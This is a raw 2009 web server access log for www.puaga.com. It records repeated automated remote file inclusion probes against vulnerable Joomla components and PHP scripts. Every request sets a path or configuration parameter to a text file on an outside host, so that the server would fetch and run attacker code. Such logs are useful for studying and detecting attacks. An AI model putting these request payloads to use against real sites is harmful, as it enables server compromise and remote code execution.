218.246.20.221 - - [05/Jul/2009:06:13:23 -0700] "GET /logs/access_090517.log//components/com_flyspray/startdown.php?file=http://defensive.ru//prog/lib/ID.txt?? HTTP/1.1" 404 5258 "-" "libwww-perl/5.79" "www.puaga.com"
218.27.203.107 - - [05/Jul/2009:06:13:29 -0700] "GET /logs/administrator/components/com_cropimage/admin.cropcanvas.php?cropimagedir=http://aboutav.com//id1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
218.27.203.107 - - [05/Jul/2009:06:13:29 -0700] "GET /administrator/components/com_cropimage/admin.cropcanvas.php?cropimagedir=http://aboutav.com//id1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
218.27.203.107 - - [05/Jul/2009:06:13:29 -0700] "GET /logs/access_090617.log%20%20/administrator/components/com_cropimage/admin.cropcanvas.php?cropimagedir=http://aboutav.com//id1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
218.27.203.107 - - [05/Jul/2009:06:13:29 -0700] "GET /logs/access_090602.log%20%20/administrator/components/com_cropimage/admin.cropcanvas.php?cropimagedir=http://aboutav.com//id1.txt??? HTTP/1.0" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
218.27.203.107 - - [05/Jul/2009:06:13:32 -0700] "GET /logs/administrator/components/com_cropimage/admin.cropcanvas.php?cropimagedir=http://aboutav.com//id1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
218.27.203.107 - - [05/Jul/2009:06:13:32 -0700] "GET /logs/access_090617.log%20%20/administrator/components/com_cropimage/admin.cropcanvas.php?cropimagedir=http://aboutav.com//id1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
218.27.203.107 - - [05/Jul/2009:06:13:32 -0700] "GET /administrator/components/com_cropimage/admin.cropcanvas.php?cropimagedir=http://aboutav.com//id1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
218.27.203.107 - - [05/Jul/2009:06:13:33 -0700] "GET /logs/access_090602.log%20%20/administrator/components/com_cropimage/admin.cropcanvas.php?cropimagedir=http://aboutav.com//id1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
83.98.209.71 - - [05/Jul/2009:06:13:59 -0700] "GET /logs/access_090620.log%20%20////?_SERVER[DOCUMENT_ROOT]=http://www.vereinte-nationen.de/kw_joomla//administrator/components/com_moofaq/css/_a?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
83.98.209.71 - - [05/Jul/2009:06:13:59 -0700] "GET ///?_SERVER[DOCUMENT_ROOT]=http://www.vereinte-nationen.de/kw_joomla//administrator/components/com_moofaq/css/_a?? HTTP/1.1" 200 6125 "-" "Mozilla/5.0" "www.puaga.com"
83.98.209.71 - - [05/Jul/2009:06:13:59 -0700] "GET /logs////?_SERVER[DOCUMENT_ROOT]=http://www.vereinte-nationen.de/kw_joomla//administrator/components/com_moofaq/css/_a?? HTTP/1.1" 200 4806 "-" "Mozilla/5.0" "www.puaga.com"
83.98.209.71 - - [05/Jul/2009:06:14:17 -0700] "GET /logs/access_090620.log%20%20////?_SERVER[DOCUMENT_ROOT]=http://www.vereinte-nationen.de/kw_joomla//administrator/components/com_moofaq/css/_a?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
83.98.209.71 - - [05/Jul/2009:06:14:17 -0700] "GET /logs////?_SERVER[DOCUMENT_ROOT]=http://www.vereinte-nationen.de/kw_joomla//administrator/components/com_moofaq/css/_a?? HTTP/1.1" 200 4806 "-" "Mozilla/5.0" "www.puaga.com"
83.98.209.71 - - [05/Jul/2009:06:14:17 -0700] "GET ///?_SERVER[DOCUMENT_ROOT]=http://www.vereinte-nationen.de/kw_joomla//administrator/components/com_moofaq/css/_a?? HTTP/1.1" 200 6125 "-" "Mozilla/5.0" "www.puaga.com"
83.98.209.71 - - [05/Jul/2009:06:14:22 -0700] "GET /logs/access_090624.log%20%20////?_SERVER[DOCUMENT_ROOT]=http://www.vereinte-nationen.de/kw_joomla//administrator/components/com_moofaq/css/_a?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
83.98.209.71 - - [05/Jul/2009:06:14:33 -0700] "GET /logs/access_090624.log%20%20////?_SERVER[DOCUMENT_ROOT]=http://www.vereinte-nationen.de/kw_joomla//administrator/components/com_moofaq/css/_a?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
83.98.209.71 - - [05/Jul/2009:06:14:53 -0700] "GET /logs/access_090620.log%20%20////?_SERVER[DOCUMENT_ROOT]=http://www.vereinte-nationen.de/kw_joomla//administrator/components/com_moofaq/css/_a?? HTTP/1.0" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
83.98.209.71 - - [05/Jul/2009:06:14:53 -0700] "GET /logs////?_SERVER[DOCUMENT_ROOT]=http://www.vereinte-nationen.de/kw_joomla//administrator/components/com_moofaq/css/_a?? HTTP/1.1" 200 4806 "-" "Mozilla/5.0" "www.puaga.com"
83.98.209.71 - - [05/Jul/2009:06:14:53 -0700] "GET ///?_SERVER[DOCUMENT_ROOT]=http://www.vereinte-nationen.de/kw_joomla//administrator/components/com_moofaq/css/_a?? HTTP/1.0" 200 6109 "-" "Mozilla/5.0" "www.puaga.com"
83.98.209.71 - - [05/Jul/2009:06:15:01 -0700] "GET /logs/access_090620.log%20%20////?_SERVER[DOCUMENT_ROOT]=http://www.vereinte-nationen.de/kw_joomla//administrator/components/com_moofaq/css/_a?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
83.98.209.71 - - [05/Jul/2009:06:15:01 -0700] "GET /logs////?_SERVER[DOCUMENT_ROOT]=http://www.vereinte-nationen.de/kw_joomla//administrator/components/com_moofaq/css/_a?? HTTP/1.1" 200 4806 "-" "Mozilla/5.0" "www.puaga.com"
83.98.209.71 - - [05/Jul/2009:06:15:01 -0700] "GET ///?_SERVER[DOCUMENT_ROOT]=http://www.vereinte-nationen.de/kw_joomla//administrator/components/com_moofaq/css/_a?? HTTP/1.1" 200 6125 "-" "Mozilla/5.0" "www.puaga.com"
83.98.209.71 - - [05/Jul/2009:06:15:11 -0700] "GET ///?_SERVER[DOCUMENT_ROOT]=http://www.vereinte-nationen.de/kw_joomla//administrator/components/com_moofaq/css/_a?? HTTP/1.1" 200 6125 "-" "Mozilla/5.0" "www.puaga.com"
83.98.209.71 - - [05/Jul/2009:06:15:11 -0700] "GET /logs////?_SERVER[DOCUMENT_ROOT]=http://www.vereinte-nationen.de/kw_joomla//administrator/components/com_moofaq/css/_a?? HTTP/1.1" 200 4806 "-" "Mozilla/5.0" "www.puaga.com"
83.98.209.71 - - [05/Jul/2009:06:15:11 -0700] "GET /logs/access_090620.log%20%20////?_SERVER[DOCUMENT_ROOT]=http://www.vereinte-nationen.de/kw_joomla//administrator/components/com_moofaq/css/_a?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
83.98.209.71 - - [05/Jul/2009:06:15:12 -0700] "GET /logs/access_090624.log%20%20////?_SERVER[DOCUMENT_ROOT]=http://www.vereinte-nationen.de/kw_joomla//administrator/components/com_moofaq/css/_a?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
83.98.209.71 - - [05/Jul/2009:06:15:23 -0700] "GET /logs/access_090624.log%20%20////?_SERVER[DOCUMENT_ROOT]=http://www.vereinte-nationen.de/kw_joomla//administrator/components/com_moofaq/css/_a?? HTTP/1.0" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
83.98.209.71 - - [05/Jul/2009:06:15:59 -0700] "GET /logs/access_090620.log%20%20////?_SERVER[DOCUMENT_ROOT]=http://extranet.teligentems.com/uiu.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
83.98.209.71 - - [05/Jul/2009:06:15:59 -0700] "GET /logs////?_SERVER[DOCUMENT_ROOT]=http://extranet.teligentems.com/uiu.txt??? HTTP/1.1" 200 4806 "-" "Mozilla/5.0" "www.puaga.com"
83.98.209.71 - - [05/Jul/2009:06:15:59 -0700] "GET ///?_SERVER[DOCUMENT_ROOT]=http://extranet.teligentems.com/uiu.txt??? HTTP/1.1" 200 6125 "-" "Mozilla/5.0" "www.puaga.com"
83.98.209.71 - - [05/Jul/2009:06:16:30 -0700] "GET /logs/access_090624.log%20%20////?_SERVER[DOCUMENT_ROOT]=http://www.vereinte-nationen.de/kw_joomla//administrator/components/com_moofaq/css/_a?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
83.98.209.71 - - [05/Jul/2009:06:16:54 -0700] "GET /logs/access_090624.log%20%20////?_SERVER[DOCUMENT_ROOT]=http://www.vereinte-nationen.de/kw_joomla//administrator/components/com_moofaq/css/_a?? HTTP/1.0" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
83.98.209.71 - - [05/Jul/2009:06:17:01 -0700] "GET /logs/access_090624.log%20%20////?_SERVER[DOCUMENT_ROOT]=http://www.vereinte-nationen.de/kw_joomla//administrator/components/com_moofaq/css/_a?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
83.98.209.71 - - [05/Jul/2009:06:17:54 -0700] "GET /logs/access_090624.log%20%20////?_SERVER[DOCUMENT_ROOT]=http://www.vereinte-nationen.de/kw_joomla//administrator/components/com_moofaq/css/_a?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
218.27.203.107 - - [05/Jul/2009:06:17:58 -0700] "GET /logs/access_090617.log/administrator/components/com_cropimage/admin.cropcanvas.php?cropimagedir=http://aboutav.com//id1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
218.27.203.107 - - [05/Jul/2009:06:18:07 -0700] "GET /logs/access_090602.log/administrator/components/com_cropimage/admin.cropcanvas.php?cropimagedir=http://aboutav.com//id1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
83.98.209.71 - - [05/Jul/2009:06:18:09 -0700] "GET /logs/access_090620.log////?_SERVER[DOCUMENT_ROOT]=http://www.vereinte-nationen.de/kw_joomla//administrator/components/com_moofaq/css/_a?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
83.98.209.71 - - [05/Jul/2009:06:18:11 -0700] "GET /logs/access_090620.log%20%20////?_SERVER[DOCUMENT_ROOT]=http://extranet.teligentems.com/uiu.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
83.98.209.71 - - [05/Jul/2009:06:18:11 -0700] "GET /logs////?_SERVER[DOCUMENT_ROOT]=http://extranet.teligentems.com/uiu.txt??? HTTP/1.1" 200 4806 "-" "Mozilla/5.0" "www.puaga.com"
83.98.209.71 - - [05/Jul/2009:06:18:12 -0700] "GET ///?_SERVER[DOCUMENT_ROOT]=http://extranet.teligentems.com/uiu.txt??? HTTP/1.1" 200 6125 "-" "Mozilla/5.0" "www.puaga.com"
218.27.203.107 - - [05/Jul/2009:06:18:15 -0700] "GET /logs/access_090617.log/administrator/components/com_cropimage/admin.cropcanvas.php?cropimagedir=http://aboutav.com//id1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
218.27.203.107 - - [05/Jul/2009:06:18:23 -0700] "GET /logs/access_090602.log/administrator/components/com_cropimage/admin.cropcanvas.php?cropimagedir=http://aboutav.com//id1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
83.98.209.71 - - [05/Jul/2009:06:18:26 -0700] "GET /logs/access_090620.log%20%20////?_SERVER[DOCUMENT_ROOT]=http://www.vereinte-nationen.de/kw_joomla//administrator/components/com_moofaq/css/_a?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
83.98.209.71 - - [05/Jul/2009:06:18:26 -0700] "GET /logs////?_SERVER[DOCUMENT_ROOT]=http://www.vereinte-nationen.de/kw_joomla//administrator/components/com_moofaq/css/_a?? HTTP/1.1" 200 4806 "-" "Mozilla/5.0" "www.puaga.com"
83.98.209.71 - - [05/Jul/2009:06:18:27 -0700] "GET ///?_SERVER[DOCUMENT_ROOT]=http://www.vereinte-nationen.de/kw_joomla//administrator/components/com_moofaq/css/_a?? HTTP/1.1" 200 6125 "-" "Mozilla/5.0" "www.puaga.com"
218.27.203.107 - - [05/Jul/2009:06:18:34 -0700] "GET /logs/access_090617.log/administrator/components/com_cropimage/admin.cropcanvas.php?cropimagedir=http://aboutav.com//id1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
83.98.209.71 - - [05/Jul/2009:06:18:35 -0700] "GET /logs/access_090620.log%20%20////?_SERVER[DOCUMENT_ROOT]=http://www.vereinte-nationen.de/kw_joomla//administrator/components/com_moofaq/css/_a?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
83.98.209.71 - - [05/Jul/2009:06:18:35 -0700] "GET /logs////?_SERVER[DOCUMENT_ROOT]=http://www.vereinte-nationen.de/kw_joomla//administrator/components/com_moofaq/css/_a?? HTTP/1.1" 200 4806 "-" "Mozilla/5.0" "www.puaga.com"
83.98.209.71 - - [05/Jul/2009:06:18:35 -0700] "GET ///?_SERVER[DOCUMENT_ROOT]=http://www.vereinte-nationen.de/kw_joomla//administrator/components/com_moofaq/css/_a?? HTTP/1.1" 200 6125 "-" "Mozilla/5.0" "www.puaga.com"
122.153.28.140 - - [05/Jul/2009:06:18:36 -0700] "GET /administrator/components/com_comprofiler/plugin.class.php?mosConfig_absolute_path=http://gana.net/kboard_v2/kboard/id1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
122.153.28.140 - - [05/Jul/2009:06:18:40 -0700] "GET /administrator/components/com_comprofiler/plugin.class.php?mosConfig_absolute_path=http://gana.net/kboard_v2/kboard/id1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
122.153.28.140 - - [05/Jul/2009:06:18:40 -0700] "GET /logs/administrator/components/com_comprofiler/plugin.class.php?mosConfig_absolute_path=http://gana.net/kboard_v2/kboard/id1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
122.153.28.140 - - [05/Jul/2009:06:18:40 -0700] "GET /logs/administrator/components/com_comprofiler/plugin.class.php?mosConfig_absolute_path=http://gana.net/kboard_v2/kboard/id1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
83.98.209.71 - - [05/Jul/2009:06:18:40 -0700] "GET /logs/access_090624.log%20%20////?_SERVER[DOCUMENT_ROOT]=http://www.vereinte-nationen.de/kw_joomla//administrator/components/com_moofaq/css/_a?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
218.27.203.107 - - [05/Jul/2009:06:18:41 -0700] "GET /logs/access_090602.log/administrator/components/com_cropimage/admin.cropcanvas.php?cropimagedir=http://aboutav.com//id1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
122.153.28.140 - - [05/Jul/2009:06:18:41 -0700] "GET /logs/access_090531.log%20%20/administrator/components/com_comprofiler/plugin.class.php?mosConfig_absolute_path=http://gana.net/kboard_v2/kboard/id1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
122.153.28.140 - - [05/Jul/2009:06:18:46 -0700] "GET /logs/access_090531.log/administrator/components/com_comprofiler/plugin.class.php?mosConfig_absolute_path=http://gana.net/kboard_v2/kboard/id1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
69.65.41.165 - - [05/Jul/2009:06:18:46 -0700] "GET /http://www.kusa-knu.com/skin/latest/random/id.txt? HTTP/1.1" 404 5258 "-" "libwww-perl/5.812" "www.puaga.com"
83.98.209.71 - - [05/Jul/2009:06:18:53 -0700] "GET /logs/access_090624.log%20%20////?_SERVER[DOCUMENT_ROOT]=http://extranet.teligentems.com/uiu.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
83.98.209.71 - - [05/Jul/2009:06:18:57 -0700] "GET /logs/access_090610.log////?_SERVER[DOCUMENT_ROOT]=http://www.vereinte-nationen.de/kw_joomla//administrator/components/com_moofaq/css/_a?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
216.120.237.150 - - [05/Jul/2009:06:19:06 -0700] "GET /logs/access_090529.log/index.php?option=com_registration&Itemid=&mosConfig_absolute_path=http://www.goldstrategie.ch/images/inv?? HTTP/1.1" 404 5258 "-" "libwww-perl/5.811" "www.puaga.com"
216.120.237.150 - - [05/Jul/2009:06:19:06 -0700] "GET /index.php?option=com_registration&Itemid=&mosConfig_absolute_path=http://www.goldstrategie.ch/images/inv?? HTTP/1.1" 200 6125 "-" "libwww-perl/5.811" "www.puaga.com"
216.120.237.150 - - [05/Jul/2009:06:19:06 -0700] "GET /logs/index.php?option=com_registration&Itemid=&mosConfig_absolute_path=http://www.goldstrategie.ch/images/inv?? HTTP/1.1" 404 5258 "-" "libwww-perl/5.811" "www.puaga.com"
83.98.209.71 - - [05/Jul/2009:06:19:24 -0700] "GET /logs/access_090624.log%20%20////?_SERVER[DOCUMENT_ROOT]=http://extranet.teligentems.com/uiu.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
94.229.66.202 - - [05/Jul/2009:06:19:25 -0700] "GET /logs/access_090616.log/faqsupport/samplefaqsupport.php?path[docroot]=http://www.thebalvenie.com/files/id.txt??? HTTP/1.1" 404 5258 "-" "libwww-perl/5.810" "www.puaga.com"
94.229.66.202 - - [05/Jul/2009:06:19:25 -0700] "GET /logs/faqsupport/samplefaqsupport.php?path[docroot]=http://www.thebalvenie.com/files/id.txt??? HTTP/1.0" 404 5258 "-" "libwww-perl/5.810" "www.puaga.com"
122.153.28.140 - - [05/Jul/2009:06:19:26 -0700] "GET /logs/access_090526.log%20%20/administrator/components/com_comprofiler/plugin.class.php?mosConfig_absolute_path=http://gana.net/kboard_v2/kboard/id1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
200.226.134.29 - - [05/Jul/2009:06:19:28 -0700] "GET /logs/access_090511.log//index2.php?page=http://www.avanceinternet.com/cms/media/id.txt? HTTP/1.1" 404 5258 "-" "libwww-perl/5.803" "www.puaga.com"
200.226.134.29 - - [05/Jul/2009:06:19:28 -0700] "GET /index2.php?page=http://www.avanceinternet.com/cms/media/id.txt? HTTP/1.1" 404 5258 "-" "libwww-perl/5.803" "www.puaga.com"
200.226.134.29 - - [05/Jul/2009:06:19:30 -0700] "GET /logs//index2.php?page=http://www.avanceinternet.com/cms/media/id.txt? HTTP/1.1" 404 5258 "-" "libwww-perl/5.803" "www.puaga.com"
94.229.66.202 - - [05/Jul/2009:06:19:30 -0700] "GET /faqsupport/samplefaqsupport.php?path[docroot]=http://www.thebalvenie.com/files/id.txt??? HTTP/1.1" 404 5258 "-" "libwww-perl/5.810" "www.puaga.com"
200.226.134.29 - - [05/Jul/2009:06:19:30 -0700] "GET /logs/access_090511.log//index2.php?page=http://www.avanceinternet.com/cms/media/id.txt? HTTP/1.1" 404 5258 "-" "libwww-perl/5.803" "www.puaga.com"
200.226.134.29 - - [05/Jul/2009:06:19:31 -0700] "GET /index2.php?page=http://www.avanceinternet.com/cms/media/id.txt? HTTP/1.1" 404 5258 "-" "libwww-perl/5.803" "www.puaga.com"
200.226.134.29 - - [05/Jul/2009:06:19:32 -0700] "GET /logs//index2.php?page=http://www.avanceinternet.com/cms/media/id.txt? HTTP/1.1" 404 5258 "-" "libwww-perl/5.803" "www.puaga.com"
122.153.28.140 - - [05/Jul/2009:06:19:33 -0700] "GET /logs/access_090526.log/administrator/components/com_comprofiler/plugin.class.php?mosConfig_absolute_path=http://gana.net/kboard_v2/kboard/id1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
94.229.66.202 - - [05/Jul/2009:06:19:40 -0700] "GET /logs/access_090602.log/class/class.dashboard_cms.php?where_framework=http://www.thebalvenie.com/files/id.txt??? HTTP/1.1" 404 5258 "-" "libwww-perl/5.810" "www.puaga.com"
94.229.66.202 - - [05/Jul/2009:06:19:40 -0700] "GET /logs/class/class.dashboard_cms.php?where_framework=http://www.thebalvenie.com/files/id.txt??? HTTP/1.1" 404 5258 "-" "libwww-perl/5.810" "www.puaga.com"
94.229.66.202 - - [05/Jul/2009:06:19:40 -0700] "GET /class/class.dashboard_cms.php?where_framework=http://www.thebalvenie.com/files/id.txt??? HTTP/1.1" 404 5258 "-" "libwww-perl/5.810" "www.puaga.com"
94.229.66.202 - - [05/Jul/2009:06:19:40 -0700] "GET /logs/access_090616.log/class/class.dashboard_cms.php?where_framework=http://www.thebalvenie.com/files/id.txt??? HTTP/1.1" 404 5258 "-" "libwww-perl/5.810" "www.puaga.com"
83.98.209.71 - - [05/Jul/2009:06:19:52 -0700] "GET /logs/access_090624.log%20%20////?_SERVER[DOCUMENT_ROOT]=http://www.vereinte-nationen.de/kw_joomla//administrator/components/com_moofaq/css/_a?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
83.98.209.71 - - [05/Jul/2009:06:19:53 -0700] "GET /logs/access_090620.log////?_SERVER[DOCUMENT_ROOT]=http://www.vereinte-nationen.de/kw_joomla//administrator/components/com_moofaq/css/_a?? HTTP/1.0" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
83.98.209.71 - - [05/Jul/2009:06:20:02 -0700] "GET /logs/access_090624.log%20%20////?_SERVER[DOCUMENT_ROOT]=http://www.vereinte-nationen.de/kw_joomla//administrator/components/com_moofaq/css/_a?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
83.98.209.71 - - [05/Jul/2009:06:20:31 -0700] "GET /logs/access_090610.log////?_SERVER[DOCUMENT_ROOT]=http://www.vereinte-nationen.de/kw_joomla//administrator/components/com_moofaq/css/_a?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
218.246.20.221 - - [05/Jul/2009:06:20:37 -0700] "GET /logs/access_090524.log//administrator/components/com_joomlaradiov5/admin.joomlaradiov5.php?mosConfig_live_site=http://defensive.ru//prog/lib/ID.txt?? HTTP/1.1" 404 5258 "-" "libwww-perl/5.79" "www.puaga.com"
218.246.20.221 - - [05/Jul/2009:06:20:37 -0700] "GET /administrator/components/com_joomlaradiov5/admin.joomlaradiov5.php?mosConfig_live_site=http://defensive.ru//prog/lib/ID.txt?? HTTP/1.1" 404 5258 "-" "libwww-perl/5.79" "www.puaga.com"
218.246.20.221 - - [05/Jul/2009:06:20:39 -0700] "GET /logs//administrator/components/com_joomlaradiov5/admin.joomlaradiov5.php?mosConfig_live_site=http://defensive.ru//prog/lib/ID.txt?? HTTP/1.1" 404 5258 "-" "libwww-perl/5.79" "www.puaga.com"
70.87.217.26 - - [05/Jul/2009:06:21:07 -0700] "GET /logs//index.php?option=com_bayesiannaivefilter&Itemid=&mosConfig_absolute_path=http://www.hit168.com.cn/id.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
70.87.217.26 - - [05/Jul/2009:06:21:07 -0700] "GET /logs/access_090615.log%20%20//index.php?option=com_bayesiannaivefilter&Itemid=&mosConfig_absolute_path=http://www.hit168.com.cn/id.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
70.87.217.26 - - [05/Jul/2009:06:21:07 -0700] "GET /index.php?option=com_bayesiannaivefilter&Itemid=&mosConfig_absolute_path=http://www.hit168.com.cn/id.txt? HTTP/1.1" 200 6125 "-" "Mozilla/5.0" "www.puaga.com"
70.87.217.26 - - [05/Jul/2009:06:21:07 -0700] "GET /logs/access_090609.log%20%20//index.php?option=com_bayesiannaivefilter&Itemid=&mosConfig_absolute_path=http://www.hit168.com.cn/id.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
70.87.217.26 - - [05/Jul/2009:06:21:08 -0700] "GET /index.php?option=com_bayesiannaivefilter&Itemid=&mosConfig_absolute_path=http://www.hit168.com.cn/id.txt? HTTP/1.1" 200 6125 "-" "Mozilla/5.0" "www.puaga.com"
70.87.217.26 - - [05/Jul/2009:06:21:08 -0700] "GET /logs/access_090615.log%20%20//index.php?option=com_bayesiannaivefilter&Itemid=&mosConfig_absolute_path=http://www.hit168.com.cn/id.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
70.87.217.26 - - [05/Jul/2009:06:21:08 -0700] "GET /logs//index.php?option=com_bayesiannaivefilter&Itemid=&mosConfig_absolute_path=http://www.hit168.com.cn/id.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
70.87.217.26 - - [05/Jul/2009:06:21:08 -0700] "GET /logs/access_090609.log%20%20//index.php?option=com_bayesiannaivefilter&Itemid=&mosConfig_absolute_path=http://www.hit168.com.cn/id.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
80.67.25.1 - - [05/Jul/2009:06:21:14 -0700] "GET /logs/access_090605.log/?sourcedir=http://dfpyvu.mxl.uabc.mx/trash/idxx.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
80.67.25.1 - - [05/Jul/2009:06:21:14 -0700] "GET /logs/?sourcedir=http://dfpyvu.mxl.uabc.mx/trash/idxx.txt?? HTTP/1.1" 200 4799 "-" "Mozilla/5.0" "www.puaga.com"
80.67.25.1 - - [05/Jul/2009:06:21:14 -0700] "GET /?sourcedir=http://dfpyvu.mxl.uabc.mx/trash/idxx.txt?? HTTP/1.1" 200 6125 "-" "Mozilla/5.0" "www.puaga.com"
80.67.25.1 - - [05/Jul/2009:06:21:18 -0700] "GET /?sourcedir=http://dfpyvu.mxl.uabc.mx/trash/idxx.txt?? HTTP/1.1" 200 6125 "-" "Mozilla/5.0" "www.puaga.com"
80.67.25.1 - - [05/Jul/2009:06:21:18 -0700] "GET /logs/access_090605.log/?sourcedir=http://dfpyvu.mxl.uabc.mx/trash/idxx.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
80.67.25.1 - - [05/Jul/2009:06:21:18 -0700] "GET /logs/?sourcedir=http://dfpyvu.mxl.uabc.mx/trash/idxx.txt?? HTTP/1.1" 200 4799 "-" "Mozilla/5.0" "www.puaga.com"
94.229.66.202 - - [05/Jul/2009:06:21:35 -0700] "GET /logs/access_090606.log/faqsupport/samplefaqsupport.php?path[docroot]=http://www.thebalvenie.com/files/id.txt??? HTTP/1.1" 404 5258 "-" "libwww-perl/5.810" "www.puaga.com"
83.98.209.71 - - [05/Jul/2009:06:21:42 -0700] "GET /logs/access_090620.log////?_SERVER[DOCUMENT_ROOT]=http://extranet.teligentems.com/uiu.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
83.98.209.71 - - [05/Jul/2009:06:22:10 -0700] "GET /logs/access_090610.log////?_SERVER[DOCUMENT_ROOT]=http://extranet.teligentems.com/uiu.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
62.128.135.52 - - [05/Jul/2009:06:22:14 -0700] "GET /logs/access_090529.log/index.php?option=com_registration&Itemid=&mosConfig_absolute_path=http://www.goldstrategie.ch/images/inv?? HTTP/1.1" 404 5258 "-" "libwww-perl/5.805" "www.puaga.com"
62.128.135.52 - - [05/Jul/2009:06:22:14 -0700] "GET /index.php?option=com_registration&Itemid=&mosConfig_absolute_path=http://www.goldstrategie.ch/images/inv?? HTTP/1.1" 200 6125 "-" "libwww-perl/5.805" "www.puaga.com"
62.128.135.52 - - [05/Jul/2009:06:22:14 -0700] "GET /logs/index.php?option=com_registration&Itemid=&mosConfig_absolute_path=http://www.goldstrategie.ch/images/inv?? HTTP/1.1" 404 5258 "-" "libwww-perl/5.805" "www.puaga.com"
70.87.217.26 - - [05/Jul/2009:06:22:35 -0700] "GET /logs/access_090615.log//index.php?option=com_bayesiannaivefilter&Itemid=&mosConfig_absolute_path=http://www.hit168.com.cn/id.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
70.87.217.26 - - [05/Jul/2009:06:22:35 -0700] "GET /logs/access_090609.log//index.php?option=com_bayesiannaivefilter&Itemid=&mosConfig_absolute_path=http://www.hit168.com.cn/id.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
70.87.217.26 - - [05/Jul/2009:06:22:36 -0700] "GET /logs/access_090615.log//index.php?option=com_bayesiannaivefilter&Itemid=&mosConfig_absolute_path=http://www.hit168.com.cn/id.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
